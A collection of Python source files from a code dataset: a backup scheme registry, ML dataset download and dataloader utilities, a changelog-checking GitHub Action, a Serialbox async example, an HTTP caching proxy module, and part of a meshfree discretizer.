KristaBackup/common/schemes/__init__.py
|
javister/krista-backup
|
f8852c20afdf483e842ff22497bdd80eedc30c78
|
[
"Apache-2.0"
] | 1
|
2020-07-28T13:47:09.000Z
|
2020-07-28T13:47:09.000Z
|
from .scheme_factory import SchemeFactory
from .schemes import schemes
_default_scheme_id = 'default'
def get_scheme(scheme_id=None):
"""Возвращает схему по scheme_id.
Args:
scheme_id: Строка, уникальное имя схемы.
Returns:
Scheme или None, если схемы с scheme_id не существует.
"""
global _default_scheme_id
if not scheme_id:
scheme_id = _default_scheme_id
scheme = schemes.get(scheme_id, None)
if scheme:
return scheme()
return None
def update_scheme(name, new_scheme):
schemes[name] = new_scheme
def set_default(scheme_id):
global _default_scheme_id
_default_scheme_id = scheme_id
def get_scheme_by_config(scheme_config):
"""Возвращает схему по конфигурации.
Returns:
Сформированную схему
Raises:
Если схема с текущим scheme_id уже существует.
"""
return SchemeFactory.from_dict(scheme_config)
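# Usage sketch (not part of the original package; the scheme id 'daily' below is
# a hypothetical example):
#
#   set_default('daily')
#   scheme = get_scheme()      # equivalent to get_scheme('daily')
#   if scheme is None:
#       raise ValueError('unknown scheme id')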
| 19.765957
| 62
| 0.70183
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 488
| 0.4548
|
77342baf47053521f8e1f5ab72083d2e5edeca75
| 4,425
|
py
|
Python
|
data/utils.py
|
dojoteef/synst
|
a1842682cf757e8a501cd9cee16f20e1a14158f1
|
[
"BSD-3-Clause"
] | 81
|
2019-06-03T18:04:22.000Z
|
2022-02-04T14:20:49.000Z
|
data/utils.py
|
dojoteef/synst
|
a1842682cf757e8a501cd9cee16f20e1a14158f1
|
[
"BSD-3-Clause"
] | 7
|
2019-08-02T06:41:20.000Z
|
2020-07-31T18:31:48.000Z
|
data/utils.py
|
dojoteef/synst
|
a1842682cf757e8a501cd9cee16f20e1a14158f1
|
[
"BSD-3-Clause"
] | 5
|
2019-06-14T04:00:25.000Z
|
2020-09-14T02:50:09.000Z
|
'''
Utilities useful for datasets
'''
import os
from functools import partial
from urllib.request import urlretrieve
import requests
from tqdm import tqdm
from torch.utils.data.dataloader import DataLoader
from torch.utils.data.sampler import BatchSampler, RandomSampler, SequentialSampler
from data.sampler import SequenceLengthSampler
# See https://github.com/tqdm/tqdm#hooks-and-callbacks
class DownloadProgressBar(tqdm):
"""Provides `update_to(n)` which uses `tqdm.update(delta_n)`."""
def __init__(self, filename):
''' '''
super(DownloadProgressBar, self).__init__(
unit='B', unit_scale=True, miniters=1, desc=filename)
def update_to(self, blocks=1, block_size=1, total_size=None):
"""
blocks : int, optional
Number of blocks transferred so far [default: 1].
block_size : int, optional
Size of each block (in tqdm units) [default: 1].
total_size : int, optional
            Total size (in tqdm units). If None [default], the total remains unchanged.
"""
if total_size:
self.total = total_size
self.update(blocks * block_size - self.n) # will also set self.n = blocks * block_size
def maybe_download(filepath, url):
''' Download the requested URL to the requested path if it does not already exist '''
directory = os.path.dirname(filepath)
if not os.path.exists(directory):
os.makedirs(directory)
if os.path.exists(filepath):
return filepath
if 'drive.google.com' in url:
return download_from_google_drive(filepath, url)
else:
return download_url(filepath, url)
def download_url(filepath, url):
''' Downloads the given url to the specified file path. '''
filename = os.path.basename(filepath)
with DownloadProgressBar(filename) as progress:
urlretrieve(url, filepath, reporthook=progress.update_to)
return filepath
def download_from_google_drive(filepath, url):
'''
Downloads a file from Google Drive.
Apparently Google Drive may issue a warning about scanning for viruses and require confirmation
to continue the download.
'''
confirmation_token = None
session = requests.Session()
response = session.get(url, stream=True)
for key, value in response.cookies.items():
if key.startswith("download_warning"):
confirmation_token = value
if confirmation_token:
url = url + "&confirm=" + confirmation_token
response = session.get(url, stream=True)
total_size = int(response.headers.get('content-length', 0))
block_size = 16 * 1024
filename = os.path.basename(filepath)
with open(filepath, "wb") as file:
with DownloadProgressBar(filename) as progress:
            blocks = (
                block
                for block in response.iter_content(block_size)
                if block  # skip keep-alive chunks
            )
            for i, block in enumerate(blocks):
                file.write(block)
                progress.update_to(i, block_size, total_size)
return filepath
def get_dataloader(config, worker_init_fn=None, pin_memory=True, num_devices=1, shuffle=False):
''' Utility function that gets a data loader '''
dataset = config.dataset(config, split=config.split).load()
if config.batch_method == 'token':
# Calculate batch sizes for each device. Potentially reduce the batch size on device 0 as
# the optimization step (all the gradients from all devices) happens on device 0.
batch_sizes = [config.batch_size - config.batch_size_buffer]
batch_sizes += [config.batch_size] * (num_devices - 1)
batch_sampler = SequenceLengthSampler(
batch_sizes,
[(len(d['input']), len(d['target'])) for d in dataset.data],
shuffle=shuffle,
granularity=config.token_bucket_granularity
)
elif config.batch_method == 'example':
sampler_fn = RandomSampler if shuffle else SequentialSampler
batch_sampler = BatchSampler(
sampler_fn(dataset),
config.batch_size,
False
)
else:
raise ValueError('Unknown batch method!')
return DataLoader(
dataset,
batch_sampler=batch_sampler,
collate_fn=partial(dataset.collate, sort=True),
num_workers=num_devices,
pin_memory=pin_memory,
worker_init_fn=worker_init_fn
)
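# Usage sketch (illustrative only; the URL, local path and `config` object are
# hypothetical; `config` normally comes from the project's own CLI/config setup):
#
#   path = maybe_download('/tmp/data/train.txt', 'https://example.com/train.txt')
#   loader = get_dataloader(config, shuffle=True)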
| 33.522727
| 99
| 0.661695
| 820
| 0.185311
| 0
| 0
| 0
| 0
| 0
| 0
| 1,194
| 0.269831
|
7734720921a60ab16b14a023eaab75451a582742
| 3,092
|
py
|
Python
|
check_changelog.py
|
pllim/action-check_astropy_changelog
|
915511a895712098ca250cb3416e2c08ffb1a0fa
|
[
"BSD-3-Clause"
] | null | null | null |
check_changelog.py
|
pllim/action-check_astropy_changelog
|
915511a895712098ca250cb3416e2c08ffb1a0fa
|
[
"BSD-3-Clause"
] | null | null | null |
check_changelog.py
|
pllim/action-check_astropy_changelog
|
915511a895712098ca250cb3416e2c08ffb1a0fa
|
[
"BSD-3-Clause"
] | null | null | null |
import json
import os
import sys
from astropy_changelog import loads
from github import Github
event_name = os.environ['GITHUB_EVENT_NAME']
if event_name not in ('pull_request_target', 'pull_request'):
print(f'No-op for {event_name}')
sys.exit(0)
event_jsonfile = os.environ['GITHUB_EVENT_PATH']
with open(event_jsonfile, encoding='utf-8') as fin:
event = json.load(fin)
pr_labels = [e['name'] for e in event['pull_request']['labels']]
if 'skip-changelog-checks' in pr_labels:
print('Changelog checks manually disabled for this pull request.')
sys.exit(0) # Green but no-op
forkrepo = event['pull_request']['head']['repo']['full_name']
pr_branch = os.environ['GITHUB_HEAD_REF']
g = Github(os.environ.get('GITHUB_TOKEN'))
clog_file = os.environ.get('CHANGELOG_FILENAME', 'CHANGES.rst')
repo = g.get_repo(forkrepo)
try:
contents = repo.get_contents(clog_file, ref=pr_branch)
except Exception:
print('This repository does not appear to have a change log! '
f'(Expecting a file named {clog_file})')
sys.exit(1)
# Parse changelog
changelog = loads(contents.decoded_content.decode('utf-8'))
# Find versions for the pull request we are looking at
pr_num = event['number']
versions = changelog.versions_for_issue(pr_num)
if len(versions) > 1:
print('Change log entry present in multiple version sections '
f'({", ".join(versions)}).')
sys.exit(1)
if len(versions) == 1:
version = versions[0]
if 'no-changelog-entry-needed' in pr_labels:
print(f'Changelog entry present in {version} but '
'**no-changelog-entry-needed** label set.')
sys.exit(1)
if 'Affects-dev' in pr_labels:
print(f'Changelog entry present in {version} but '
'**Affects-dev** label set.')
sys.exit(1)
base_repo = event['pull_request']['base']['repo']['full_name']
repo = g.get_repo(base_repo)
pr = repo.get_pull(pr_num)
if not pr.milestone:
print(f'Cannot check for consistency of change log in {version} since '
'milestone is not set.')
sys.exit(1)
milestone = pr.milestone.title
if milestone.startswith('v'):
milestone = milestone[1:]
if version.startswith('v'):
version = version[1:]
if milestone != version:
print(f'Changelog entry section ({version}) '
f'inconsistent with milestone ({milestone}).')
sys.exit(1)
print(f'Changelog entry consistent with milestone ({milestone}).')
else: # No change log found
if 'Affects-dev' in pr_labels:
print('Changelog entry not present, as expected since the '
'**Affects-dev** label is present.')
elif 'no-changelog-entry-needed' in pr_labels:
print('Changelog entry not present, as expected since the '
'**no-changelog-entry-needed** label is present')
else:
        print('Changelog entry not present (or PR number missing), and '
'neither the **Affects-dev** nor the '
'**no-changelog-entry-needed** label is set.')
sys.exit(1)
| 31.876289
| 79
| 0.654916
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,460
| 0.472186
|
7734b23f84997ddc3801f990923aea0601af3e94
| 4,037
|
py
|
Python
|
examples/python/example-05-async.py
|
lukasm91/serialbox2
|
3a8dba366ef160df684c957e59c0a5f6b1b17244
|
[
"BSD-2-Clause"
] | 1
|
2020-09-04T00:43:52.000Z
|
2020-09-04T00:43:52.000Z
|
examples/python/example-05-async.py
|
mlange05/serialbox2
|
fa72d8a39f62c7c0b76536680f7a9953957f59f2
|
[
"BSD-2-Clause"
] | null | null | null |
examples/python/example-05-async.py
|
mlange05/serialbox2
|
fa72d8a39f62c7c0b76536680f7a9953957f59f2
|
[
"BSD-2-Clause"
] | null | null | null |
#!/usr/bin/python3
# -*- coding: utf-8 -*-
##===-----------------------------------------------------------------------------*- Python -*-===##
##
## S E R I A L B O X
##
## This file is distributed under terms of BSD license.
## See LICENSE.txt for more information.
##
##===------------------------------------------------------------------------------------------===##
##
## This example demonstrates the asynchronous API of Serialbox which can improve the throughput of
## read operations.
##
##===------------------------------------------------------------------------------------------===##
#
# First, we have to make sure Python finds the Serialbox module. Alternatively, you can also set the
# environment variable PYTHONPATH.
#
import os
import sys
import time
sys.path.append(os.path.dirname(os.path.realpath(__file__)) + '/../python')
sys.path.append(os.path.dirname(os.path.realpath(__file__)) + '/../../src/serialbox-python')
#
# Import Serialbox
#
import serialbox as ser
import numpy as np
def main():
N = 512; M = 512; K = 80
savepoint = ser.Savepoint('sp')
#
# First, we write some data to disk ...
#
serializer_write = ser.Serializer(ser.OpenModeKind.Write, "./async", "Field", "Binary")
field_1 = np.random.rand(N, M, K)
field_2 = np.random.rand(N, M, K)
field_3 = np.random.rand(N, M, K)
field_4 = np.random.rand(N, M, K)
field_5 = np.random.rand(N, M, K)
field_6 = np.random.rand(N, M, K)
serializer_write.write('field_1', savepoint, field_1)
serializer_write.write('field_2', savepoint, field_2)
serializer_write.write('field_3', savepoint, field_3)
serializer_write.write('field_4', savepoint, field_4)
serializer_write.write('field_5', savepoint, field_5)
serializer_write.write('field_6', savepoint, field_6)
#
# ... and read it again.
#
serializer_read = ser.Serializer(ser.OpenModeKind.Read, "./async", "Field", "Binary")
start = time.time()
field_1_rd = serializer_read.read('field_1', savepoint)
field_2_rd = serializer_read.read('field_2', savepoint)
field_3_rd = serializer_read.read('field_3', savepoint)
field_4_rd = serializer_read.read('field_4', savepoint)
field_5_rd = serializer_read.read('field_5', savepoint)
field_6_rd = serializer_read.read('field_6', savepoint)
print("Serializer.read : %8.2f s" % (time.time() - start))
#
# Read operations are usually embarrassingly parallel and we can leverage this parallelism by
# launching the operations asynchronously. If the archive is not thread-safe or if the library
# was not configured with `SERIALBOX_ASYNC_API` the method falls back to synchronous execution.
# To synchronize the tasks in the end, we can add a blocking Serializer.wait_for_all().
#
start = time.time()
field_1_rd_async = serializer_read.read_async('field_1', savepoint)
field_2_rd_async = serializer_read.read_async('field_2', savepoint)
field_3_rd_async = serializer_read.read_async('field_3', savepoint)
field_4_rd_async = serializer_read.read_async('field_4', savepoint)
field_5_rd_async = serializer_read.read_async('field_5', savepoint)
field_6_rd_async = serializer_read.read_async('field_6', savepoint)
serializer_read.wait_for_all()
print("Serializer.read_async : %8.2f s" % (time.time() - start))
#
# Finally, we verify the read operations actually do the same.
#
assert(np.allclose(field_1_rd, field_1_rd_async))
assert(np.allclose(field_2_rd, field_2_rd_async))
assert(np.allclose(field_3_rd, field_3_rd_async))
assert(np.allclose(field_4_rd, field_4_rd_async))
assert(np.allclose(field_5_rd, field_5_rd_async))
assert(np.allclose(field_6_rd, field_6_rd_async))
#
# Remove directory
#
import shutil
shutil.rmtree("./async")
if __name__ == '__main__':
main()
| 36.7
| 102
| 0.626951
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,676
| 0.41516
|
7734ec4ada3d6545396115d166790d365032b3f9
| 6,793
|
py
|
Python
|
johnny_cache/cache.py
|
Sonictherocketman/cache-proxy
|
75650fb143b365e922c03f87e388c5710ad21799
|
[
"MIT"
] | 3
|
2019-07-23T02:33:04.000Z
|
2021-05-25T16:57:24.000Z
|
johnny_cache/cache.py
|
Sonictherocketman/cache-proxy
|
75650fb143b365e922c03f87e388c5710ad21799
|
[
"MIT"
] | null | null | null |
johnny_cache/cache.py
|
Sonictherocketman/cache-proxy
|
75650fb143b365e922c03f87e388c5710ad21799
|
[
"MIT"
] | null | null | null |
from dataclasses import dataclass
from datetime import datetime, timedelta
import json
import os.path
from dateutil.parser import parse
import pytz
import redis
from redis.lock import LockError
import requests
from . import settings
from .logger import logger
UNCACHED_HEADERS = (
'Age',
'Cache-Control',
'Date',
'X-Cache',
)
def get_cache():
if settings.REDIS_URL:
logger.info('Using Redis Cache.')
return RedisCache(settings.REDIS_URL)
logger.info('Using Local Cache.')
return PersistedCache(
os.path.join(settings.CACHE_LOCATION, settings.CACHE_NAME)
)
class PersistedCache(object):
store = {}
def __init__(self, cache_location):
self.cache_location = cache_location
try:
self.store.update(self.load(cache_location))
except IOError:
            logger.warning('No existing cache detected. Will create one.')
except Exception:
logger.error('Could not load cache. Removing and recreating.')
self.save()
finally:
logger.info(f'Cache prepopulated with {len(self.store.keys())} items.')
def get(self, key):
return self.store.get(key, None)
def set(self, key, value):
self.store[key] = value
try:
self.save()
except Exception:
            logger.error('Could not save cache. Dumping store and regenerating.')
self.store = {}
self.save()
def save(self):
with open(self.cache_location, 'w+') as f:
json.dump({
key: cache_item.encode()
for key, cache_item in self.store.items()
}, f)
def load(self, cache_location):
with open(cache_location, 'r+') as f:
return {
key: CacheItem.decode(value)
for key, value in json.load(f).items()
}
class RedisCache(object):
def __init__(self, url):
self.ttl = (
settings.MAX_CACHE_SECONDS
if settings.MAX_CACHE_SECONDS > 0
else None
)
self.client = redis.Redis.from_url(url)
logger.info(f'Connected to redis: {url}')
def get(self, key):
value = self.client.get(key)
if not value:
return None
return CacheItem.decode(json.loads(value))
def set(self, key, value):
value = json.dumps(value.encode())
try:
with self.client.lock(f'lock__{key}', blocking_timeout=6, timeout=2):
self.client.set(key, value, ex=self.ttl)
except LockError as e:
            logger.error(f'Failed to acquire lock for key {key}\n{e}')
return None
@dataclass
class CacheItem:
""" A record in the cache. """
url: str
headers: dict
etag: str
expires: datetime
last_modified: datetime
created_at: datetime
@property
def is_expired(self):
if settings.MAX_CACHE_SECONDS == 0:
return False
expires = (
self.created_at + timedelta(seconds=settings.MAX_CACHE_SECONDS)
)
return expires < datetime.now(pytz.utc)
@property
def is_valid(self):
logger.debug(
f'Using: {self.url}\n'
f'\tEtag: {self.etag}\n'
f'\tExpires: {self.expires}\n'
f'\tLast-Modified: {self.last_modified}\n'
f'-------------------------------------'
)
if not self.expires and not self.last_modified and not self.etag:
logger.debug('No cache information.')
return False
if self.etag == '-1':
logger.debug(f'Forcing uncached version due to Etag: {self.etag}')
return False
if self.is_expired:
logger.debug('CacheItem has expired.')
return False
if self.expires and self.expires > datetime.now(pytz.utc):
logger.debug('Using cached version due to Expires.')
return True
logger.debug(f'>>> HEAD {self.url}')
try:
head_check = requests.head(
self.url,
timeout=10,
)
head_check.raise_for_status()
except Exception as e:
logger.error(f'>>> HEAD {self.url} failed with error: {e}')
return False
etag = head_check.headers.get('etag', None)
logger.debug(f'Trying ETag... {etag}')
if etag and etag == self.etag:
return True
last_modified = head_check.headers.get('last-modified', None)
logger.debug(f'Trying Last-Modified... {last_modified}')
if (
last_modified
and self.last_modified
and parse(last_modified) <= self.last_modified
):
return True
return False
def encode(self):
return [
self.url,
self.headers,
self.etag,
self.expires.isoformat() if self.expires else None,
self.last_modified.isoformat() if self.last_modified else None,
self.created_at.isoformat(),
]
@classmethod
def decode(cls, value):
url, headers, etag, expires_str, last_modified_str, created_at_str = value
return CacheItem(
url=url,
headers=headers,
etag=etag,
expires=parse(expires_str) if expires_str else None,
last_modified=parse(last_modified_str) if last_modified_str else None,
created_at=parse(created_at_str)
)
# Global Cache
request_cache = get_cache()
# Cache Functions
def check(url):
item = request_cache.get(url)
if item is None:
return None
if not item.is_valid:
return None
return item
def get(url):
return request_cache.get(url)
def add(url, response):
expires = response.headers.get('expires')
last_modified = response.headers.get('last-modified')
etag = response.headers.get('etag')
if etag:
etag = (
etag
.replace('W/', '') # replace weak comparison marker
.replace('"', '') # replace quotes
)
headers = {
key: value
for key, value in dict(response.headers).items()
if key not in UNCACHED_HEADERS
}
request_cache.set(url, CacheItem(
url=url,
headers=headers,
etag=etag,
expires=parse(expires) if expires else None,
last_modified=parse(last_modified) if last_modified else None,
created_at=datetime.now(pytz.utc),
))
logger.debug(
f'Adding: {url}\n'
f'\tEtag: {etag}\n'
f'\tExpires: {expires}\n'
f'\tLast-Modified: {last_modified}\n'
f'-------------------------------------'
)
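# Usage sketch (illustrative; the URL is hypothetical). The intended proxy flow
# is: consult the cache first, fetch and record only on a miss.
#
#   url = 'https://example.com/feed.xml'
#   item = check(url)
#   if item is None:
#       response = requests.get(url, timeout=10)
#       add(url, response)
#       headers = dict(response.headers)
#   else:
#       headers = item.headers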
| 26.02682
| 83
| 0.568968
| 4,917
| 0.723833
| 0
| 0
| 2,848
| 0.419255
| 0
| 0
| 1,117
| 0.164434
|
77356d7dc5fcffe3a5f270ff80863770415d901d
| 25,609
|
py
|
Python
|
discretizer.py
|
WeiXuanChan/PIMRMeshfree
|
1011dc86e7363a53a13353db8e61dca31cc07350
|
[
"MIT"
] | null | null | null |
discretizer.py
|
WeiXuanChan/PIMRMeshfree
|
1011dc86e7363a53a13353db8e61dca31cc07350
|
[
"MIT"
] | null | null | null |
discretizer.py
|
WeiXuanChan/PIMRMeshfree
|
1011dc86e7363a53a13353db8e61dca31cc07350
|
[
"MIT"
] | 1
|
2017-05-17T09:16:24.000Z
|
2017-05-17T09:16:24.000Z
|
'''
File: discretizer.py
Description: function definition
History:
Date Programmer SAR# - Description
---------- ---------- ----------------------------
Author: w. x. chan 29Apr2016 - Created
'''
import numpy as np
from . import pinm as pinm
from stl import mesh
from mpl_toolkits import mplot3d
from matplotlib import pyplot
from matplotlib import colors as Colors
from matplotlib.widgets import Button
import matplotlib.cm as cmx
def stlImport(filePath,coords):
# Create a new plot
figure = pyplot.figure()
pyplot.subplots_adjust(bottom=0.2)
axes = mplot3d.Axes3D(figure)
# Load the STL files and add the vectors to the plot
modelMesh = mesh.Mesh.from_file(filePath)
indexedTri=[]
for n in range(len(modelMesh.vectors)):
indexedTri.append(mplot3d.art3d.Poly3DCollection([modelMesh.vectors[n]],facecolors='b'))
axes.add_collection3d(indexedTri[n])
indexedTri[0].set_facecolor('k')
    scale = modelMesh.points.flatten()
axes.auto_scale_xyz(scale, scale, scale)
callback = DomainSelector(indexedTri)
axprev = pyplot.axes([0.7, 0.05, 0.1, 0.075])
axnext = pyplot.axes([0.81, 0.05, 0.1, 0.075])
axselect = pyplot.axes([0.05, 0.05, 0.15, 0.075])
axaddToDomain = pyplot.axes([0.05, 0.85, 0.15, 0.075])
axswapSelected = pyplot.axes([0.8, 0.85, 0.15, 0.075])
bnext = Button(axnext, 'Next')
bnext.on_clicked(callback.next)
bprev = Button(axprev, 'Previous')
bprev.on_clicked(callback.prev)
bselect = Button(axselect, '(un)Select')
bselect.on_clicked(callback.select)
baddToDomain = Button(axaddToDomain, 'Add Domain')
baddToDomain.on_clicked(callback.addToDomain)
bswapSelected = Button(axswapSelected, 'Swap Selected')
bswapSelected.on_clicked(callback.swapSelected)
# Show the plot to the screen
#pyplot.connect('key_press_event', callback.keyPressed)
pyplot.show()
maindomain=pinm.Domain('')
subdomain=[]
for domainNumber in range(callback.domainCount):
subdomain.append(pinm.Domain(''))
maindomain.addNode(subdomain[domainNumber])
normalVector=[]
vertices=[]
minvert={}
maxvert={}
for n in range(len(modelMesh.normals)):
normalVector.append({})
vertices.append([])
for keyIndex in range(len(coords)):
normalVector[n][coords[keyIndex]]=modelMesh.normals[n][keyIndex]
for m in range(3):
temp_vert={}
for keyIndex in range(len(coords)):
if coords[keyIndex] not in minvert:
minvert[coords[keyIndex]]=modelMesh.vectors[n][m][keyIndex]
else:
minvert[coords[keyIndex]]=min(minvert[coords[keyIndex]],modelMesh.vectors[n][m][keyIndex])
if coords[keyIndex] not in maxvert:
maxvert[coords[keyIndex]]=modelMesh.vectors[n][m][keyIndex]
else:
maxvert[coords[keyIndex]]=max(maxvert[coords[keyIndex]],modelMesh.vectors[n][m][keyIndex])
temp_vert[coords[keyIndex]]=modelMesh.vectors[n][m][keyIndex]
vertices[n].append(temp_vert)
domainVertices=[]
for n in range(8):
temp_domainVertices={}
for key in range(len(coords)):
if (key==0 and (n in [1,2,5,6])) or (key==1 and (n in [2,3,6,7])) or (key==2 and (n in [4,5,6,7])):
temp_domainVertices[coords[key]]=maxvert[coords[key]]
else:
temp_domainVertices[coords[key]]=minvert[coords[key]]
domainVertices.append(temp_domainVertices)
for n in range(len(callback.domainInfo)):
temp_sub2domain=pinm.Domain('',norm=normalVector[n])
temp_sub2domain.setCentroid(vertices[n])
subdomain[callback.domainInfo[n]].addNode(temp_sub2domain)
maindomain.setCentroid(domainVertices)
return (maindomain,subdomain)
def createMainDomain(minvert,maxvert,coords):
maindomain=pinm.Domain('')
domainVertices=[]
for n in range(8):
temp_domainVertices={}
for key in range(len(coords)):
if (key==0 and (n in [1,2,5,6])) or (key==1 and (n in [2,3,6,7])) or (key==2 and (n in [4,5,6,7])):
temp_domainVertices[coords[key]]=maxvert[coords[key]]
else:
temp_domainVertices[coords[key]]=minvert[coords[key]]
domainVertices.append(temp_domainVertices)
maindomain.setCentroid(domainVertices)
return maindomain
def filterNodes(domainList,nodalDistribution,closeness=0.2): #first in list is prioritized to keep
nodes=[]
for domain in domainList:
for node in domain.nodes():
nodes.append(node)
for n in range(len(nodes)):
if nodes[n].domain!=None:
nodalSpacing=nodalDistribution(nodes[n].pos)
closeNodalSpacing=multiplyDictionary(nodalSpacing,closeness)
linkedNodes=findNodes(nodes[n].pos,domainList,distance=closeNodalSpacing,searchDepth=-1.)
for temp_linkNode in linkedNodes:
if temp_linkNode is not nodes[n]:
temp_domain=temp_linkNode.domain
temp_domain.removeNode(temp_linkNode)
temp_linkNode.domain=None
while len(temp_domain.subDomain)==0:
if temp_domain.superDomain==None:
break
else:
temp2_domain=temp_domain.superDomain
temp2_domain.removeNode(temp_domain)
temp_domain=temp2_domain
return;
def secondaryLinkNode(targetNode,primarylinkIdentifier,secondarylinkIdentifier='secondary'):
nodes=[]
targetNode.addLink(secondarylinkIdentifier,targetNode)
for node in targetNode.link[primarylinkIdentifier]:
for temp_node in node.link[primarylinkIdentifier]:
            targetNode.addLink(secondarylinkIdentifier,temp_node)
return;
def primaryLinkNodes(domainList,nodalDistribution,linkIdentifier='primary',closeness=1.5):#influence is function with dictionary input and output
nodes=[]
for domain in domainList:
for node in domain.nodes():
nodes.append(node)
for n in range(len(nodes)):
nodalSpacing=nodalDistribution(nodes[n].pos)
expandedNodalSpacing=multiplyDictionary(nodalSpacing,closeness)
linkedNodes=findNodes(nodes[n].pos,domainList,distance=expandedNodalSpacing,searchDepth=-1.)
addNodesToLink=[]
for temp_linkNode in linkedNodes:
if temp_linkNode is not nodes[n]:
addNodesToLink.append(temp_linkNode)
addNodesToLink.insert(0,nodes[n])
nodes[n].addLink(linkIdentifier,addNodesToLink)
return;
def duplicateNode(coordinateIdentifier,value,nodePorting,newNodes,domainList,targetDomain):
nodeInDomain=[]
for domain in domainList:
if type(domain) is pinm.Node:
            new_pos=domain.pos.copy()
            new_pos[coordinateIdentifier]=value
            newNode=pinm.Node(new_pos)
            tempCopy=domain.variable.copy()
            for key in tempCopy:
                newNode.addvariable(key,tempCopy[key])
            newNode.addLink('copied from',domain)
            tempCopy=domain.linkBasis.copy()
            for key in tempCopy:
                newNode.setLinkBasis(key,tempCopy[key])
            newNode.setNorm(domain.norm.copy())
            newNode.setNormLink(domain.normLink)
            for n in range(len(domain.material)):
                newNode.addMaterial(n,domain.material[n])
            tempCopy=domain.variableLink.copy()
for key in tempCopy:
newNode.setVariableLink(key,tempCopy[key])
nodePorting[domain]=newNode
newNodes.append(newNode)
nodeInDomain.append(newNode)
else:
newDomain=pinm.Domain('')
newDomain.pos=domain.pos.copy()
newDomain.maxDistance=domain.maxDistance.copy()
newDomain.pos[coordinateIdentifier]=value
newDomain.maxDistance[coordinateIdentifier]=0.
nodeInDomain.append(newDomain)
duplicateNode(coordinateIdentifier,value,nodePorting,newNodes,domain.subDomain,newDomain)
targetDomain.addNode(nodeInDomain)
return nodeInDomain
def extrudeDimension(domainList,coordinateIdentifier,valueList,prevLinkIdentifier='',nextLinkIdentifier=''):
newDomain=[]
prevNodes=[]
    for m, value in enumerate(valueList):
newNodes=[]
nodePorting={}
newDomain.append([])
for domain in domainList:
tempDomain=pinm.Domain('')
tempDomain.pos=domain.pos.copy()
tempDomain.maxDistance=domain.maxDistance.copy()
tempDomain.pos[coordinateIdentifier]=value
tempDomain.maxDistance[coordinateIdentifier]=0.
newDomain[-1].append(tempDomain)
duplicateNode(coordinateIdentifier,value,nodePorting,newNodes,domain.subDomain,tempDomain)
for new_node in newNodes:
for temp_linkIdentifier in new_node.link['copied from'][0].link:
if temp_linkIdentifier!='copied from':
tempList=[]
for linkNode in new_node.link['copied from'][0].link[temp_linkIdentifier]:
tempList.append(nodePorting[linkNode])
new_node.addLink(temp_linkIdentifier,tempList)
if (prevLinkIdentifier!='' or nextLinkIdentifier!='') and len(prevNodes)!=0:
for n in range(len(newNodes)):
                if prevLinkIdentifier!='':
                    prevNodes[n].addLink(prevLinkIdentifier,newNodes[n])
                if nextLinkIdentifier!='':
                    newNodes[n].addLink(nextLinkIdentifier,prevNodes[n])
prevNodes=newNodes[:]
return newDomain
def arrangeExtrudeDimension(domainList,coordinateIdentifier,valueList,prevLinkIdentifier='',nextLinkIdentifier='',newDomainNameAddOn=' new',firstDomainNameAddOn='',lastDomainNameAddOn=''):
nameList=[]
for domain in domainList:
nameList.append(domain.name)
subDomain=extrudeDimension(domainList,coordinateIdentifier,valueList,prevLinkIdentifier=prevLinkIdentifier,nextLinkIdentifier=nextLinkIdentifier)
newDomain=[]
startDomain=[]
endDomain=[]
for n in range(len(subDomain[0])):
startCount=0
endCountReduce=0
if firstDomainNameAddOn!='':
if firstDomainNameAddOn!=lastDomainNameAddOn:
subDomain[0][n].setDomainName(nameList[n]+firstDomainNameAddOn)
startDomain.append(subDomain[0][n])
startCount=1
if lastDomainNameAddOn!='':
if firstDomainNameAddOn!=lastDomainNameAddOn:
subDomain[-1][n].setDomainName(nameList[n]+lastDomainNameAddOn)
else:
domainGroup=pinm.Domain(nameList[n]+firstDomainNameAddOn)
domainGroup.addNode([subDomain[0][n],subDomain[-1][n]])
endDomain.append(subDomain[-1][n])
endCountReduce=1
leftOverDomain=[]
for m in range(startCount,len(subDomain)-endCountReduce):
leftOverDomain.append(subDomain[m][n])
if len(leftOverDomain)!=0:
tempDomain=pinm.Domain(nameList[n]+newDomainNameAddOn)
tempDomain.addNode(leftOverDomain)
newDomain.append(tempDomain)
return (newDomain,startDomain,endDomain)
def meshSurfaceDomainTriangle(subDomain,nodalDistribution):
for domain in subDomain:
for sub2domain in domain.subDomain:
toBeFurtherMeshed=meshTriangleSpliting(sub2domain,nodalDistribution)
while len(toBeFurtherMeshed)>0:
copy_toBeFurtherMeshed=toBeFurtherMeshed
toBeFurtherMeshed=[]
for new_domain in copy_toBeFurtherMeshed:
for temp_domain in meshTriangleSpliting(new_domain,nodalDistribution):
toBeFurtherMeshed.append(temp_domain)
return;
def meshMainDomain(mainDomain,boundaryDomainList,nodalDistribution,meshOuterNode=False):
innerNodesDomain=pinm.Domain('')
innerNodesDomain.setCentroid(mainDomain.vertices)
mainDomain.addNode(innerNodesDomain)
toBeFurtherMeshed=meshVolume(innerNodesDomain,boundaryDomainList,nodalDistribution,meshOuter=meshOuterNode)
while len(toBeFurtherMeshed)>0:
copy_toBeFurtherMeshed=toBeFurtherMeshed
toBeFurtherMeshed=[]
for new_domain in copy_toBeFurtherMeshed:
for temp_domain in meshVolume(new_domain,boundaryDomainList,nodalDistribution,meshOuter=meshOuterNode):
toBeFurtherMeshed.append(temp_domain)
return innerNodesDomain
def meshTriangleSpliting(domain,nodalDistribution): #nodalDistribution is a function with both i/o dictionary objects
toBeFurtherMeshed=[]
subDomain=[]
#check for odd triangle
sidelength=[0.,0.,0.]
maxSideLength=0.
minSideLength=float('inf')
maxSideIndex=-1
minSideIndex=-1
for n in range(len(domain.vertices)):
for coord in domain.vertices[0]:
sidelength[n]+=(domain.vertices[n][coord]-domain.vertices[n-1][coord])**2.
sidelength[n]=np.sqrt(sidelength[n])
if sidelength[n]>maxSideLength:
maxSideLength=sidelength[n]
maxSideIndex=n
if sidelength[n]<minSideLength:
minSideLength=sidelength[n]
minSideIndex=n
NodeSpacing=nodalDistribution(domain.pos)
newPoint=multiplyDictionary(addDictionary([domain.vertices[maxSideIndex],domain.vertices[maxSideIndex-1]]),0.5)
tri1Domain=pinm.Domain('',norm=domain.normalVector)
tri1Domain.setCentroid([newPoint,domain.vertices[maxSideIndex],domain.vertices[maxSideIndex-2]])
tri2Domain=pinm.Domain('',norm=domain.normalVector)
tri2Domain.setCentroid([newPoint,domain.vertices[maxSideIndex-2],domain.vertices[maxSideIndex-1]])
temp_total=0.
for coord in NodeSpacing:
temp_total+=NodeSpacing[coord]**2.
